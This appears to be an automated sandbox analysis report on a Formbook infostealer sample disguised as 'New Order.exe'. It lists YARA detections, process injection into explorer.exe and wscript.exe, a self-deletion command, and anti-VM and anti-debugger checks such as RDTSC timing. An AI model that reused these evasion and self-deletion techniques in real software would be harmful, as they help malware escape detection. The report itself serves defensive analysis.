          Source: 00000002.00000002.690073712.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.690073712.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.642981900.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.642981900.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.690378991.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.690378991.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.New Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.New Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.New Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.New Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.New Order.exe.22a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.New Order.exe.22a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.New Order.exe.22a0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.New Order.exe.22a0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@11/7
          Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_01
          Source: C:\Users\user\Desktop\New Order.exeFile created: C:\Users\user\AppData\Local\Temp\nssD6D2.tmpJump to behavior
          Source: New Order.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\New Order.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\New Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: New Order.exeReversingLabs: Detection: 36%
          Source: C:\Users\user\Desktop\New Order.exeFile read: C:\Users\user\Desktop\New Order.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\New Order.exe 'C:\Users\user\Desktop\New Order.exe'
          Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Users\user\Desktop\New Order.exe 'C:\Users\user\Desktop\New Order.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\New Order.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Users\user\Desktop\New Order.exe 'C:\Users\user\Desktop\New Order.exe'
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\New Order.exe'
          Source: C:\Users\user\Desktop\New Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: wscript.pdbGCTL source: New Order.exe, 00000002.00000002.690441656.0000000000A30000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.656881329.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: New Order.exe, 00000000.00000003.641817824.0000000009770000.00000004.00000001.sdmp, New Order.exe, 00000002.00000002.690473130.0000000000BC0000.00000040.00000001.sdmp, wscript.exe, 00000005.00000002.901871458.0000000005420000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: New Order.exe, wscript.exe
          Source: Binary string: wscript.pdb source: New Order.exe, 00000002.00000002.690441656.0000000000A30000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.656881329.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\New Order.exeUnpacked PE file: 2.2.New Order.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_10001D3B GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,lstrcatA,GetProcAddress,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_100029F0 push eax; ret
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00415E63 push esp; iretd
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C3D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_1_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_1_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_1_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_1_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_1_00415E63 push esp; iretd
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0549D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0339C33C push 020DC012h; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0339B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_03395E63 push esp; iretd
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0339B40B push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0339B402 push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0339B46C push eax; ret
          Source: C:\Users\user\Desktop\New Order.exeFile created: C:\Users\user\AppData\Local\Temp\nssD6D3.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\New Order.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\New Order.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 00000000033885E4 second address: 00000000033885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 000000000338896E second address: 0000000003388974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\New Order.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_004088A0 rdtsc
          Source: C:\Windows\explorer.exe TID: 3844Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\wscript.exe TID: 3524Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_00402671 FindFirstFileA,
          Source: explorer.exe, 00000003.00000000.681162732.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.660805445.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.657224309.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.660805445.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.660941932.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: explorer.exe, 00000003.00000000.653530097.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000003.00000000.681162732.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.660941932.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000003.00000000.681162732.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.661002462.000000000A782000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000003.00000000.681162732.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\New Order.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\New Order.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wscript.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00409B10 LdrLoadDll,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_10001D3B GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,lstrcatA,GetProcAddress,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C7B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C63884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C63884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C00050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C00050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C67016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C67016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C67016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C12990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BEB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BEB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BEC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C04120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C12ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BFAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BFAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C12AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
